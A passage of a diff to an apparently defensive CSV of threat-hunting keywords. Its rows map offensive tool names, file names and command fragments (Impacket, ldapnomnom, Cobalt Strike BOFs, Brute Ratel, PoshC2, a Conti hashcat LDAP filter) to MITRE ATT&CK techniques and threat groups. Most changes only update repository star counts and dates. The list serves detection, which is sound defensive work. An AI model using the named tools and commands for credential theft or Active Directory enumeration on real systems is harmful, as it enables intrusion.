Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ldapasn1.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*ldapattack.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*ldapattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ldapattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*ldapdomaindump*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z" -"*LDAPDomainDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*LDAPDomainDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*ldapfilter:*admincount=1* /format:hashcat*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*LdapMiner*","offensive_tool_keyword","ldapminer","This is a tool I wrote to collect information from different LDAP Server implementation. This was written in C with the Netscape C","T1016 - T1018 - T1021 - T1046 - T1056 - T1069 - T1078 - T1087 - T1114 - T1482 - T1526 - T1597","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Information Gathering","https://sourceforge.net/projects/ldapminer/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*ldapnomnom --input*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","0","N/A","N/A","7","697","60","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" -"*ldapnomnom*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","60","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" -"*ldapnomnom-darwin-*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","60","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" -"*ldapnomnom-linux-*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","60","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" -"*ldapnomnom-main*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","60","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" -"*ldapnomnom-windows-386.exe*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","60","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" -"*ldapnomnom-windows-amd64.exe*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","60","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" -"*ldapnomnom-windows-arm64.exe*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","60","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*ldapnomnom --input*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","0","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*ldapnomnom*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*ldapnomnom-darwin-*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*ldapnomnom-linux-*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*ldapnomnom-main*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*ldapnomnom-windows-386.exe*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*ldapnomnom-windows-amd64.exe*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*ldapnomnom-windows-arm64.exe*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" "*LDAP-Password-Hunter*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","10","2","189","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*ldaprelayclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*ldaprelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ldaprelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*LdapRelayScan.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*LdapRelayScan.py*","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","N/A","4","389","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" -"*LdapRelayScan-main*","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","8","4","389","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" +"*LdapRelayScan.py*","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","N/A","4","390","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" +"*LdapRelayScan-main*","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","8","4","390","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" "*ldapsearchad.py*","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","1","N/A","N/A","2","123","26","2023-05-10T13:30:16Z","2019-12-08T00:25:57Z" "*ldapsearch-ad.py*","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","1","N/A","N/A","2","123","26","2023-05-10T13:30:16Z","2019-12-08T00:25:57Z" -"*ldap-searcher *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*ldap-searcher *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*ldapsentinel * raw *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ldapsentinel forest user*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*LdapSignCheck.exe*","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","148","22","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" @@ -13057,9 +13214,9 @@ "*LdapSignCheck.sln*","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","148","22","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" "*ldapsigncheck.x64.*","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","148","22","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" "*ldapsigncheck.x86.*","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","148","22","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" -"*LDAPWordlistHarvester.ps1*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","218","14","2023-10-01T21:12:10Z","2023-09-22T10:10:10Z" -"*LDAPWordlistHarvester.py*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","218","14","2023-10-01T21:12:10Z","2023-09-22T10:10:10Z" -"*LDAPWordlistHarvester-main*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","218","14","2023-10-01T21:12:10Z","2023-09-22T10:10:10Z" +"*LDAPWordlistHarvester.ps1*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","221","14","2023-10-04T19:01:55Z","2023-09-22T10:10:10Z" +"*LDAPWordlistHarvester.py*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","221","14","2023-10-04T19:01:55Z","2023-09-22T10:10:10Z" +"*LDAPWordlistHarvester-main*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","221","14","2023-10-04T19:01:55Z","2023-09-22T10:10:10Z" "*ldd2bloodhound*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z" "*ldeep cache *","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","0","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" "*ldeep ldap -u *","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","0","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" @@ -13067,34 +13224,34 @@ "*ldeep*ldap_activedirectory.py*","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" 